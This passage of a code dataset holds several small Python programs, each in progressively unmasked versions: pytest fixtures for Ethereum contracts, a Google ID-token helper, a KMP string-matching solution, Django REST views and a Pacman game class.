remove_0x_prefix(encode_hex(keys[3]))\n\n\n@pytest.fixture(scope='session')\ndef deployer_address(deployer_privkey):\n return privkey_to_addr(deployer_privkey)\n\n\n@pytest.fixture(scope='session')\ndef contract_abi_path():\n return os.path.join(os.path.dirname(os.path.dirname(__file__)), '../data/contracts.json')\n\n\n@pytest.fixture(scope='session')\ndef contract_abis(contract_abi_path):\n abi_file = open(contract_abi_path, 'r')\n return json.load(abi_file)\n\n\n@pytest.fixture(scope='session')\ndef channel_manager_abi(contract_abis):\n return contract_abis[CHANNEL_MANAGER_ABI_NAME]['abi']\n\n\n@pytest.fixture(scope='session')\ndef channel_manager_bytecode(contract_abis):\n return contract_abis[CHANNEL_MANAGER_ABI_NAME]['bytecode']\n\n\n@pytest.fixture(scope='session')\ndef token_abi(contract_abis):\n return contract_abis[TOKEN_ABI_NAME]['abi']\n\n\n@pytest.fixture(scope='session')\ndef token_bytecode(contract_abis):\n return contract_abis[TOKEN_ABI_NAME]['bytecode']\n\n\n@pytest.fixture(scope='session')\ndef kovan_block_time():\n return 4\n",
"step-ids": [
10,
11,
17,
18,
21
]
}
|
[
10,
11,
17,
18,
21
] |
<|reserved_special_token_0|>
def getIdInfo(token):
try:
idinfo = client.verify_id_token(token, CLIENT_ID)
if idinfo['aud'] not in [CLIENT_ID]:
return None
if idinfo['iss'] not in ['accounts.google.com',
'https://accounts.google.com']:
return None
except crypt.AppIdentityError:
return None
return idinfo
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def fetchIdToken():
url = 'https://www.googleapis.com/oauth2/v3/tokeninfo?id_token='
f = urllib.urlopen(url + urllib.urlencode(CLIENT_ID))
if f.getCode() != 200:
return None
return f.read()
def getIdInfo(token):
try:
idinfo = client.verify_id_token(token, CLIENT_ID)
if idinfo['aud'] not in [CLIENT_ID]:
return None
if idinfo['iss'] not in ['accounts.google.com',
'https://accounts.google.com']:
return None
except crypt.AppIdentityError:
return None
return idinfo
<|reserved_special_token_1|>
<|reserved_special_token_0|>
CLIENT_ID = (
'788221055258-j59svg86sv121jdr7utnhc2rs9tkb9s4.apps.googleusercontent.com')
def fetchIdToken():
url = 'https://www.googleapis.com/oauth2/v3/tokeninfo?id_token='
f = urllib.urlopen(url + urllib.urlencode(CLIENT_ID))
if f.getCode() != 200:
return None
return f.read()
def getIdInfo(token):
try:
idinfo = client.verify_id_token(token, CLIENT_ID)
if idinfo['aud'] not in [CLIENT_ID]:
return None
if idinfo['iss'] not in ['accounts.google.com',
'https://accounts.google.com']:
return None
except crypt.AppIdentityError:
return None
return idinfo
<|reserved_special_token_1|>
from oauth2client import client, crypt
CLIENT_ID = (
'788221055258-j59svg86sv121jdr7utnhc2rs9tkb9s4.apps.googleusercontent.com')
def fetchIdToken():
url = 'https://www.googleapis.com/oauth2/v3/tokeninfo?id_token='
f = urllib.urlopen(url + urllib.urlencode(CLIENT_ID))
if f.getCode() != 200:
return None
return f.read()
def getIdInfo(token):
try:
idinfo = client.verify_id_token(token, CLIENT_ID)
if idinfo['aud'] not in [CLIENT_ID]:
return None
if idinfo['iss'] not in ['accounts.google.com',
'https://accounts.google.com']:
return None
except crypt.AppIdentityError:
return None
return idinfo
<|reserved_special_token_1|>
#!/usr/bin/env python2.7
# Google APIs
from oauth2client import client, crypt
CLIENT_ID = '788221055258-j59svg86sv121jdr7utnhc2rs9tkb9s4.apps.googleusercontent.com'
def fetchIdToken():
url = 'https://www.googleapis.com/oauth2/v3/tokeninfo?id_token='
f = urllib.urlopen(url + urllib.urlencode(CLIENT_ID))
if f.getCode() != 200:
return None
return f.read()
def getIdInfo(token):
try:
idinfo = client.verify_id_token(token, CLIENT_ID)
if idinfo['aud'] not in [CLIENT_ID]:
# raise crypt.AppIdentityError("Unrecognized client.")
return None
if idinfo['iss'] not in ['accounts.google.com', 'https://accounts.google.com']:
# raise crypt.AppIdentityError("Wrong issuer.")
return None
except crypt.AppIdentityError:
return None
return idinfo
|
flexible
|
{
"blob_id": "2251a6064998f25cca41b018a383053d73bd09eb",
"index": 2321,
"step-1": "<mask token>\n\n\ndef getIdInfo(token):\n try:\n idinfo = client.verify_id_token(token, CLIENT_ID)\n if idinfo['aud'] not in [CLIENT_ID]:\n return None\n if idinfo['iss'] not in ['accounts.google.com',\n 'https://accounts.google.com']:\n return None\n except crypt.AppIdentityError:\n return None\n return idinfo\n",
"step-2": "<mask token>\n\n\ndef fetchIdToken():\n url = 'https://www.googleapis.com/oauth2/v3/tokeninfo?id_token='\n f = urllib.urlopen(url + urllib.urlencode(CLIENT_ID))\n if f.getCode() != 200:\n return None\n return f.read()\n\n\ndef getIdInfo(token):\n try:\n idinfo = client.verify_id_token(token, CLIENT_ID)\n if idinfo['aud'] not in [CLIENT_ID]:\n return None\n if idinfo['iss'] not in ['accounts.google.com',\n 'https://accounts.google.com']:\n return None\n except crypt.AppIdentityError:\n return None\n return idinfo\n",
"step-3": "<mask token>\nCLIENT_ID = (\n '788221055258-j59svg86sv121jdr7utnhc2rs9tkb9s4.apps.googleusercontent.com')\n\n\ndef fetchIdToken():\n url = 'https://www.googleapis.com/oauth2/v3/tokeninfo?id_token='\n f = urllib.urlopen(url + urllib.urlencode(CLIENT_ID))\n if f.getCode() != 200:\n return None\n return f.read()\n\n\ndef getIdInfo(token):\n try:\n idinfo = client.verify_id_token(token, CLIENT_ID)\n if idinfo['aud'] not in [CLIENT_ID]:\n return None\n if idinfo['iss'] not in ['accounts.google.com',\n 'https://accounts.google.com']:\n return None\n except crypt.AppIdentityError:\n return None\n return idinfo\n",
"step-4": "from oauth2client import client, crypt\nCLIENT_ID = (\n '788221055258-j59svg86sv121jdr7utnhc2rs9tkb9s4.apps.googleusercontent.com')\n\n\ndef fetchIdToken():\n url = 'https://www.googleapis.com/oauth2/v3/tokeninfo?id_token='\n f = urllib.urlopen(url + urllib.urlencode(CLIENT_ID))\n if f.getCode() != 200:\n return None\n return f.read()\n\n\ndef getIdInfo(token):\n try:\n idinfo = client.verify_id_token(token, CLIENT_ID)\n if idinfo['aud'] not in [CLIENT_ID]:\n return None\n if idinfo['iss'] not in ['accounts.google.com',\n 'https://accounts.google.com']:\n return None\n except crypt.AppIdentityError:\n return None\n return idinfo\n",
"step-5": "#!/usr/bin/env python2.7\n\n# Google APIs\nfrom oauth2client import client, crypt\n\nCLIENT_ID = '788221055258-j59svg86sv121jdr7utnhc2rs9tkb9s4.apps.googleusercontent.com'\n\ndef fetchIdToken():\n url = 'https://www.googleapis.com/oauth2/v3/tokeninfo?id_token='\n f = urllib.urlopen(url + urllib.urlencode(CLIENT_ID))\n if f.getCode() != 200:\n return None\n return f.read()\n\ndef getIdInfo(token):\n try:\n idinfo = client.verify_id_token(token, CLIENT_ID)\n if idinfo['aud'] not in [CLIENT_ID]:\n # raise crypt.AppIdentityError(\"Unrecognized client.\")\n return None\n if idinfo['iss'] not in ['accounts.google.com', 'https://accounts.google.com']:\n # raise crypt.AppIdentityError(\"Wrong issuer.\")\n return None\n except crypt.AppIdentityError:\n return None\n return idinfo\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# Autor : Kevin Oswaldo Palacios Jimenez
# Fecha de creacion: 16/09/19
# Se genera un bucle con for
# al no tener argumento print no genera ningun cambio
# mas que continuar a la siguiente linea
for i in range (1,11):
encabezado="Tabla del {}"
print(encabezado.format(i))
print()
# Usaremos un for dentro de otro generando un bucle mas
for j in range(1,11):
# en donde i tendremos la base
# con j tendriamos el elemento
salida="{} x {} = {}"
print(salida.format(i,j,i*j))
else:
# con el bucle teniendo su proceso iterativo
# se saltaran las linea pero ejecutando el codigo
print()
|
normal
|
{
"blob_id": "86f365612e9f15e7658160ecab1d3d9970ca364e",
"index": 9699,
"step-1": "<mask token>\n",
"step-2": "for i in range(1, 11):\n encabezado = 'Tabla del {}'\n print(encabezado.format(i))\n print()\n for j in range(1, 11):\n salida = '{} x {} = {}'\n print(salida.format(i, j, i * j))\n else:\n print()\n",
"step-3": "# Autor : Kevin Oswaldo Palacios Jimenez\r\n# Fecha de creacion: 16/09/19 \r\n\r\n# Se genera un bucle con for \r\n# al no tener argumento print no genera ningun cambio \r\n# mas que continuar a la siguiente linea\r\nfor i in range (1,11): \r\n encabezado=\"Tabla del {}\" \r\n print(encabezado.format(i))\r\n\r\n print() \r\n # Usaremos un for dentro de otro generando un bucle mas\r\n for j in range(1,11): \r\n # en donde i tendremos la base \r\n # con j tendriamos el elemento\r\n salida=\"{} x {} = {}\" \r\n print(salida.format(i,j,i*j)) \r\n else: \r\n # con el bucle teniendo su proceso iterativo \r\n # se saltaran las linea pero ejecutando el codigo \r\n print() ",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
def get_common(h, n):
pi = get_partial_matched(n)
begin = 0
matched = 0
while begin + matched < len(h):
if matched < len(n) and h[begin + matched] == n[matched]:
matched += 1
if matched == len(n):
return len(n) - begin
elif matched == 0:
begin += 1
else:
begin += matched - pi[matched - 1]
matched = pi[matched - 1]
return 0
def solution(status):
n = len(status)
ret = 0
for i in range(n - 1):
clockwise = i % 2 == 0
if clockwise:
ret += get_common(2 * status[i], status[i + 1])
else:
ret += get_common(2 * status[i + 1], status[i])
return ret
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def get_partial_matched(n):
pi = [0] * len(n)
begin = 1
matched = 0
while begin + matched < len(n):
if n[begin + matched] == n[matched]:
matched += 1
pi[begin + matched - 1] = matched
elif matched == 0:
begin += 1
else:
begin += matched - pi[matched - 1]
matched = pi[matched - 1]
return pi
def get_common(h, n):
pi = get_partial_matched(n)
begin = 0
matched = 0
while begin + matched < len(h):
if matched < len(n) and h[begin + matched] == n[matched]:
matched += 1
if matched == len(n):
return len(n) - begin
elif matched == 0:
begin += 1
else:
begin += matched - pi[matched - 1]
matched = pi[matched - 1]
return 0
def solution(status):
n = len(status)
ret = 0
for i in range(n - 1):
clockwise = i % 2 == 0
if clockwise:
ret += get_common(2 * status[i], status[i + 1])
else:
ret += get_common(2 * status[i + 1], status[i])
return ret
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def get_partial_matched(n):
pi = [0] * len(n)
begin = 1
matched = 0
while begin + matched < len(n):
if n[begin + matched] == n[matched]:
matched += 1
pi[begin + matched - 1] = matched
elif matched == 0:
begin += 1
else:
begin += matched - pi[matched - 1]
matched = pi[matched - 1]
return pi
def get_common(h, n):
pi = get_partial_matched(n)
begin = 0
matched = 0
while begin + matched < len(h):
if matched < len(n) and h[begin + matched] == n[matched]:
matched += 1
if matched == len(n):
return len(n) - begin
elif matched == 0:
begin += 1
else:
begin += matched - pi[matched - 1]
matched = pi[matched - 1]
return 0
def solution(status):
n = len(status)
ret = 0
for i in range(n - 1):
clockwise = i % 2 == 0
if clockwise:
ret += get_common(2 * status[i], status[i + 1])
else:
ret += get_common(2 * status[i + 1], status[i])
return ret
<|reserved_special_token_0|>
for _ in range(C):
N = int(input())
status = []
for _ in range(N + 1):
status.append(input())
print(solution(status))
<|reserved_special_token_1|>
def get_partial_matched(n):
pi = [0] * len(n)
begin = 1
matched = 0
while begin + matched < len(n):
if n[begin + matched] == n[matched]:
matched += 1
pi[begin + matched - 1] = matched
elif matched == 0:
begin += 1
else:
begin += matched - pi[matched - 1]
matched = pi[matched - 1]
return pi
def get_common(h, n):
pi = get_partial_matched(n)
begin = 0
matched = 0
while begin + matched < len(h):
if matched < len(n) and h[begin + matched] == n[matched]:
matched += 1
if matched == len(n):
return len(n) - begin
elif matched == 0:
begin += 1
else:
begin += matched - pi[matched - 1]
matched = pi[matched - 1]
return 0
def solution(status):
n = len(status)
ret = 0
for i in range(n - 1):
clockwise = i % 2 == 0
if clockwise:
ret += get_common(2 * status[i], status[i + 1])
else:
ret += get_common(2 * status[i + 1], status[i])
return ret
C = int(input())
for _ in range(C):
N = int(input())
status = []
for _ in range(N + 1):
status.append(input())
print(solution(status))
<|reserved_special_token_1|>
def get_partial_matched(n):
pi = [0] * len(n)
begin = 1
matched = 0
while begin + matched < len(n):
if n[begin + matched] == n[matched]:
matched += 1
pi[begin + matched - 1] = matched
else:
if matched == 0:
begin += 1
else:
begin += matched - pi[matched - 1]
matched = pi[matched - 1]
return pi
def get_common(h, n):
pi = get_partial_matched(n)
begin = 0
matched = 0
while begin + matched < len(h):
if matched < len(n) and h[begin + matched] == n[matched]:
matched += 1
if matched == len(n):
return len(n) - begin
else:
if matched == 0:
begin += 1
else:
begin += matched - pi[matched - 1]
matched = pi[matched - 1]
return 0
def solution(status):
n = len(status)
ret = 0
for i in range(n - 1):
clockwise = i % 2 == 0
if clockwise:
ret += get_common(2 * status[i], status[i + 1])
else:
ret += get_common(2 * status[i + 1], status[i])
return ret
C = int(input())
for _ in range(C):
N = int(input())
status = []
for _ in range(N + 1):
status.append(input())
print(solution(status))
|
flexible
|
{
"blob_id": "16a77c45a58e31c575511146dfceeaef0a2bc3a7",
"index": 3640,
"step-1": "<mask token>\n\n\ndef get_common(h, n):\n pi = get_partial_matched(n)\n begin = 0\n matched = 0\n while begin + matched < len(h):\n if matched < len(n) and h[begin + matched] == n[matched]:\n matched += 1\n if matched == len(n):\n return len(n) - begin\n elif matched == 0:\n begin += 1\n else:\n begin += matched - pi[matched - 1]\n matched = pi[matched - 1]\n return 0\n\n\ndef solution(status):\n n = len(status)\n ret = 0\n for i in range(n - 1):\n clockwise = i % 2 == 0\n if clockwise:\n ret += get_common(2 * status[i], status[i + 1])\n else:\n ret += get_common(2 * status[i + 1], status[i])\n return ret\n\n\n<mask token>\n",
"step-2": "def get_partial_matched(n):\n pi = [0] * len(n)\n begin = 1\n matched = 0\n while begin + matched < len(n):\n if n[begin + matched] == n[matched]:\n matched += 1\n pi[begin + matched - 1] = matched\n elif matched == 0:\n begin += 1\n else:\n begin += matched - pi[matched - 1]\n matched = pi[matched - 1]\n return pi\n\n\ndef get_common(h, n):\n pi = get_partial_matched(n)\n begin = 0\n matched = 0\n while begin + matched < len(h):\n if matched < len(n) and h[begin + matched] == n[matched]:\n matched += 1\n if matched == len(n):\n return len(n) - begin\n elif matched == 0:\n begin += 1\n else:\n begin += matched - pi[matched - 1]\n matched = pi[matched - 1]\n return 0\n\n\ndef solution(status):\n n = len(status)\n ret = 0\n for i in range(n - 1):\n clockwise = i % 2 == 0\n if clockwise:\n ret += get_common(2 * status[i], status[i + 1])\n else:\n ret += get_common(2 * status[i + 1], status[i])\n return ret\n\n\n<mask token>\n",
"step-3": "def get_partial_matched(n):\n pi = [0] * len(n)\n begin = 1\n matched = 0\n while begin + matched < len(n):\n if n[begin + matched] == n[matched]:\n matched += 1\n pi[begin + matched - 1] = matched\n elif matched == 0:\n begin += 1\n else:\n begin += matched - pi[matched - 1]\n matched = pi[matched - 1]\n return pi\n\n\ndef get_common(h, n):\n pi = get_partial_matched(n)\n begin = 0\n matched = 0\n while begin + matched < len(h):\n if matched < len(n) and h[begin + matched] == n[matched]:\n matched += 1\n if matched == len(n):\n return len(n) - begin\n elif matched == 0:\n begin += 1\n else:\n begin += matched - pi[matched - 1]\n matched = pi[matched - 1]\n return 0\n\n\ndef solution(status):\n n = len(status)\n ret = 0\n for i in range(n - 1):\n clockwise = i % 2 == 0\n if clockwise:\n ret += get_common(2 * status[i], status[i + 1])\n else:\n ret += get_common(2 * status[i + 1], status[i])\n return ret\n\n\n<mask token>\nfor _ in range(C):\n N = int(input())\n status = []\n for _ in range(N + 1):\n status.append(input())\n print(solution(status))\n",
"step-4": "def get_partial_matched(n):\n pi = [0] * len(n)\n begin = 1\n matched = 0\n while begin + matched < len(n):\n if n[begin + matched] == n[matched]:\n matched += 1\n pi[begin + matched - 1] = matched\n elif matched == 0:\n begin += 1\n else:\n begin += matched - pi[matched - 1]\n matched = pi[matched - 1]\n return pi\n\n\ndef get_common(h, n):\n pi = get_partial_matched(n)\n begin = 0\n matched = 0\n while begin + matched < len(h):\n if matched < len(n) and h[begin + matched] == n[matched]:\n matched += 1\n if matched == len(n):\n return len(n) - begin\n elif matched == 0:\n begin += 1\n else:\n begin += matched - pi[matched - 1]\n matched = pi[matched - 1]\n return 0\n\n\ndef solution(status):\n n = len(status)\n ret = 0\n for i in range(n - 1):\n clockwise = i % 2 == 0\n if clockwise:\n ret += get_common(2 * status[i], status[i + 1])\n else:\n ret += get_common(2 * status[i + 1], status[i])\n return ret\n\n\nC = int(input())\nfor _ in range(C):\n N = int(input())\n status = []\n for _ in range(N + 1):\n status.append(input())\n print(solution(status))\n",
"step-5": "def get_partial_matched(n):\n pi = [0] * len(n)\n begin = 1\n matched = 0\n while begin + matched < len(n):\n if n[begin + matched] == n[matched]:\n matched += 1\n pi[begin + matched - 1] = matched\n else:\n if matched == 0:\n begin += 1\n else:\n begin += matched - pi[matched - 1]\n matched = pi[matched - 1]\n return pi\n\n\ndef get_common(h, n):\n pi = get_partial_matched(n)\n begin = 0\n matched = 0\n while begin + matched < len(h):\n if matched < len(n) and h[begin + matched] == n[matched]:\n matched += 1\n if matched == len(n):\n return len(n) - begin\n else:\n if matched == 0:\n begin += 1\n else:\n begin += matched - pi[matched - 1]\n matched = pi[matched - 1]\n return 0\n\n\ndef solution(status):\n n = len(status)\n ret = 0\n for i in range(n - 1):\n clockwise = i % 2 == 0\n if clockwise:\n ret += get_common(2 * status[i], status[i + 1])\n else:\n ret += get_common(2 * status[i + 1], status[i])\n return ret\n\n\nC = int(input())\n\nfor _ in range(C):\n N = int(input())\n status = []\n for _ in range(N + 1):\n status.append(input())\n print(solution(status))\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
class ConcertDetail(RetrieveUpdateDestroyAPIView):
permission_classes = IsOwnerOrReadOnly,
queryset = Concert.objects.all()
serializer_class = ConcertSerializer
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ConcertList(ListCreateAPIView):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class ConcertDetail(RetrieveUpdateDestroyAPIView):
permission_classes = IsOwnerOrReadOnly,
queryset = Concert.objects.all()
serializer_class = ConcertSerializer
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ConcertList(ListCreateAPIView):
queryset = Concert.objects.all()
serializer_class = ConcertSerializer
class ConcertDetail(RetrieveUpdateDestroyAPIView):
permission_classes = IsOwnerOrReadOnly,
queryset = Concert.objects.all()
serializer_class = ConcertSerializer
<|reserved_special_token_1|>
from rest_framework.generics import ListCreateAPIView, RetrieveUpdateDestroyAPIView
from .serializers import ConcertSerializer
from .models import Concert
from .permissions import IsOwnerOrReadOnly
class ConcertList(ListCreateAPIView):
queryset = Concert.objects.all()
serializer_class = ConcertSerializer
class ConcertDetail(RetrieveUpdateDestroyAPIView):
permission_classes = IsOwnerOrReadOnly,
queryset = Concert.objects.all()
serializer_class = ConcertSerializer
<|reserved_special_token_1|>
from rest_framework.generics import ListCreateAPIView, RetrieveUpdateDestroyAPIView
from .serializers import ConcertSerializer
from .models import Concert
from .permissions import IsOwnerOrReadOnly
class ConcertList(ListCreateAPIView):
queryset = Concert.objects.all()
serializer_class = ConcertSerializer
class ConcertDetail(RetrieveUpdateDestroyAPIView):
permission_classes = (IsOwnerOrReadOnly,)
queryset = Concert.objects.all()
serializer_class = ConcertSerializer
|
flexible
|
{
"blob_id": "74ad2ec2cd7cd683a773b0affde4ab0b150d74c5",
"index": 4780,
"step-1": "<mask token>\n\n\nclass ConcertDetail(RetrieveUpdateDestroyAPIView):\n permission_classes = IsOwnerOrReadOnly,\n queryset = Concert.objects.all()\n serializer_class = ConcertSerializer\n",
"step-2": "<mask token>\n\n\nclass ConcertList(ListCreateAPIView):\n <mask token>\n <mask token>\n\n\nclass ConcertDetail(RetrieveUpdateDestroyAPIView):\n permission_classes = IsOwnerOrReadOnly,\n queryset = Concert.objects.all()\n serializer_class = ConcertSerializer\n",
"step-3": "<mask token>\n\n\nclass ConcertList(ListCreateAPIView):\n queryset = Concert.objects.all()\n serializer_class = ConcertSerializer\n\n\nclass ConcertDetail(RetrieveUpdateDestroyAPIView):\n permission_classes = IsOwnerOrReadOnly,\n queryset = Concert.objects.all()\n serializer_class = ConcertSerializer\n",
"step-4": "from rest_framework.generics import ListCreateAPIView, RetrieveUpdateDestroyAPIView\nfrom .serializers import ConcertSerializer\nfrom .models import Concert\nfrom .permissions import IsOwnerOrReadOnly\n\n\nclass ConcertList(ListCreateAPIView):\n queryset = Concert.objects.all()\n serializer_class = ConcertSerializer\n\n\nclass ConcertDetail(RetrieveUpdateDestroyAPIView):\n permission_classes = IsOwnerOrReadOnly,\n queryset = Concert.objects.all()\n serializer_class = ConcertSerializer\n",
"step-5": "from rest_framework.generics import ListCreateAPIView, RetrieveUpdateDestroyAPIView\nfrom .serializers import ConcertSerializer\nfrom .models import Concert\nfrom .permissions import IsOwnerOrReadOnly\n\nclass ConcertList(ListCreateAPIView):\n queryset = Concert.objects.all()\n serializer_class = ConcertSerializer\n\n\nclass ConcertDetail(RetrieveUpdateDestroyAPIView):\n permission_classes = (IsOwnerOrReadOnly,)\n queryset = Concert.objects.all()\n serializer_class = ConcertSerializer\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def add2nums(a, b):
return a + b
<|reserved_special_token_1|>
# function to add two numbers
def add2nums(a,b):
return a+b
|
flexible
|
{
"blob_id": "6e2fb9d498294a580426ff408183f7beec135329",
"index": 5592,
"step-1": "<mask token>\n",
"step-2": "def add2nums(a, b):\n return a + b\n",
"step-3": "# function to add two numbers\ndef add2nums(a,b):\n return a+b\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import pygame
from config import *
from Map import *
from NeuralNetwork import *
class Pacman(object):
RADIUS = int(TILE_WIDTH/2)
def __init__(self, mapa, neural_net):
self.mapa = mapa
self.pos_x = 11
self.pos_y = 17
self.vel_x = 1
self.vel_y = 0
self.isAlive = True
self.Frame = 0
self.score = 0
self.count = 0
self.count2 = 0
self.lastMove = ""
self.movesCount = 0
self.neural_network = neural_net
def update(self, input_data):
self.Frame += 1
self.handle_mov(input_data)
self.handle_colision()
if(self.count > TimeToStarve):
self.killPacman()
if(self.Frame == FPS/MPS):
self.Frame = 0
def handle_colision(self):
if(self.mapa.map[self.pos_y][self.pos_x] == 2):
self.mapa.getFruit(self.pos_y,self.pos_x)
self.count = 0
self.score += 1
def draw(self, win):
pygame.draw.circle(
win,
pygame.color.Color("yellow"),
(
self.pos_x * TILE_WIDTH + self.RADIUS,
self.pos_y * TILE_HEIGHT + self.RADIUS
), self.RADIUS
)
def handle_mov(self, input_data):
movement = (self.vel_x, self.vel_y)
vel_list = {
'up': (0, -1),
'down': (0, 1),
'left': (-1, 0),
'right': (1, 0)
}
movement = vel_list[self.neural_network.nextaction(input_data)]
if self.lastMove == movement:
self.movesCount += 1
else:
self.movesCount = 0
self.lastMove = movement
if(self.mapa.map[self.pos_y + movement[1]][self.pos_x + movement[0]] != 1):
self.vel_x, self.vel_y = movement
if(self.Frame == (FPS/MPS) and self.mapa.map[self.pos_y + self.vel_y][self.pos_x + self.vel_x] != 1):
self.pos_x += self.vel_x
self.pos_y += self.vel_y
self.count2 += 1
self.count += 1
def getPos(self):
return (self.pos_x, self.pos_y)
def getVel(self):
return (self.vel_x, self.vel_y)
def killPacman(self):
self.isAlive = False
|
normal
|
{
"blob_id": "d3b5d87b56421940449fdef48be6da9fa650dd90",
"index": 1756,
"step-1": "<mask token>\n\n\nclass Pacman(object):\n <mask token>\n\n def __init__(self, mapa, neural_net):\n self.mapa = mapa\n self.pos_x = 11\n self.pos_y = 17\n self.vel_x = 1\n self.vel_y = 0\n self.isAlive = True\n self.Frame = 0\n self.score = 0\n self.count = 0\n self.count2 = 0\n self.lastMove = ''\n self.movesCount = 0\n self.neural_network = neural_net\n\n def update(self, input_data):\n self.Frame += 1\n self.handle_mov(input_data)\n self.handle_colision()\n if self.count > TimeToStarve:\n self.killPacman()\n if self.Frame == FPS / MPS:\n self.Frame = 0\n\n def handle_colision(self):\n if self.mapa.map[self.pos_y][self.pos_x] == 2:\n self.mapa.getFruit(self.pos_y, self.pos_x)\n self.count = 0\n self.score += 1\n\n def draw(self, win):\n pygame.draw.circle(win, pygame.color.Color('yellow'), (self.pos_x *\n TILE_WIDTH + self.RADIUS, self.pos_y * TILE_HEIGHT + self.\n RADIUS), self.RADIUS)\n <mask token>\n\n def getPos(self):\n return self.pos_x, self.pos_y\n\n def getVel(self):\n return self.vel_x, self.vel_y\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Pacman(object):\n <mask token>\n\n def __init__(self, mapa, neural_net):\n self.mapa = mapa\n self.pos_x = 11\n self.pos_y = 17\n self.vel_x = 1\n self.vel_y = 0\n self.isAlive = True\n self.Frame = 0\n self.score = 0\n self.count = 0\n self.count2 = 0\n self.lastMove = ''\n self.movesCount = 0\n self.neural_network = neural_net\n\n def update(self, input_data):\n self.Frame += 1\n self.handle_mov(input_data)\n self.handle_colision()\n if self.count > TimeToStarve:\n self.killPacman()\n if self.Frame == FPS / MPS:\n self.Frame = 0\n\n def handle_colision(self):\n if self.mapa.map[self.pos_y][self.pos_x] == 2:\n self.mapa.getFruit(self.pos_y, self.pos_x)\n self.count = 0\n self.score += 1\n\n def draw(self, win):\n pygame.draw.circle(win, pygame.color.Color('yellow'), (self.pos_x *\n TILE_WIDTH + self.RADIUS, self.pos_y * TILE_HEIGHT + self.\n RADIUS), self.RADIUS)\n <mask token>\n\n def getPos(self):\n return self.pos_x, self.pos_y\n\n def getVel(self):\n return self.vel_x, self.vel_y\n\n def killPacman(self):\n self.isAlive = False\n",
"step-3": "<mask token>\n\n\nclass Pacman(object):\n RADIUS = int(TILE_WIDTH / 2)\n\n def __init__(self, mapa, neural_net):\n self.mapa = mapa\n self.pos_x = 11\n self.pos_y = 17\n self.vel_x = 1\n self.vel_y = 0\n self.isAlive = True\n self.Frame = 0\n self.score = 0\n self.count = 0\n self.count2 = 0\n self.lastMove = ''\n self.movesCount = 0\n self.neural_network = neural_net\n\n def update(self, input_data):\n self.Frame += 1\n self.handle_mov(input_data)\n self.handle_colision()\n if self.count > TimeToStarve:\n self.killPacman()\n if self.Frame == FPS / MPS:\n self.Frame = 0\n\n def handle_colision(self):\n if self.mapa.map[self.pos_y][self.pos_x] == 2:\n self.mapa.getFruit(self.pos_y, self.pos_x)\n self.count = 0\n self.score += 1\n\n def draw(self, win):\n pygame.draw.circle(win, pygame.color.Color('yellow'), (self.pos_x *\n TILE_WIDTH + self.RADIUS, self.pos_y * TILE_HEIGHT + self.\n RADIUS), self.RADIUS)\n\n def handle_mov(self, input_data):\n movement = self.vel_x, self.vel_y\n vel_list = {'up': (0, -1), 'down': (0, 1), 'left': (-1, 0), 'right':\n (1, 0)}\n movement = vel_list[self.neural_network.nextaction(input_data)]\n if self.lastMove == movement:\n self.movesCount += 1\n else:\n self.movesCount = 0\n self.lastMove = movement\n if self.mapa.map[self.pos_y + movement[1]][self.pos_x + movement[0]\n ] != 1:\n self.vel_x, self.vel_y = movement\n if self.Frame == FPS / MPS and self.mapa.map[self.pos_y + self.vel_y][\n self.pos_x + self.vel_x] != 1:\n self.pos_x += self.vel_x\n self.pos_y += self.vel_y\n self.count2 += 1\n self.count += 1\n\n def getPos(self):\n return self.pos_x, self.pos_y\n\n def getVel(self):\n return self.vel_x, self.vel_y\n\n def killPacman(self):\n self.isAlive = False\n",
"step-4": "import pygame\nfrom config import *\nfrom Map import *\nfrom NeuralNetwork import *\n\n\nclass Pacman(object):\n RADIUS = int(TILE_WIDTH / 2)\n\n def __init__(self, mapa, neural_net):\n self.mapa = mapa\n self.pos_x = 11\n self.pos_y = 17\n self.vel_x = 1\n self.vel_y = 0\n self.isAlive = True\n self.Frame = 0\n self.score = 0\n self.count = 0\n self.count2 = 0\n self.lastMove = ''\n self.movesCount = 0\n self.neural_network = neural_net\n\n def update(self, input_data):\n self.Frame += 1\n self.handle_mov(input_data)\n self.handle_colision()\n if self.count > TimeToStarve:\n self.killPacman()\n if self.Frame == FPS / MPS:\n self.Frame = 0\n\n def handle_colision(self):\n if self.mapa.map[self.pos_y][self.pos_x] == 2:\n self.mapa.getFruit(self.pos_y, self.pos_x)\n self.count = 0\n self.score += 1\n\n def draw(self, win):\n pygame.draw.circle(win, pygame.color.Color('yellow'), (self.pos_x *\n TILE_WIDTH + self.RADIUS, self.pos_y * TILE_HEIGHT + self.\n RADIUS), self.RADIUS)\n\n def handle_mov(self, input_data):\n movement = self.vel_x, self.vel_y\n vel_list = {'up': (0, -1), 'down': (0, 1), 'left': (-1, 0), 'right':\n (1, 0)}\n movement = vel_list[self.neural_network.nextaction(input_data)]\n if self.lastMove == movement:\n self.movesCount += 1\n else:\n self.movesCount = 0\n self.lastMove = movement\n if self.mapa.map[self.pos_y + movement[1]][self.pos_x + movement[0]\n ] != 1:\n self.vel_x, self.vel_y = movement\n if self.Frame == FPS / MPS and self.mapa.map[self.pos_y + self.vel_y][\n self.pos_x + self.vel_x] != 1:\n self.pos_x += self.vel_x\n self.pos_y += self.vel_y\n self.count2 += 1\n self.count += 1\n\n def getPos(self):\n return self.pos_x, self.pos_y\n\n def getVel(self):\n return self.vel_x, self.vel_y\n\n def killPacman(self):\n self.isAlive = False\n",
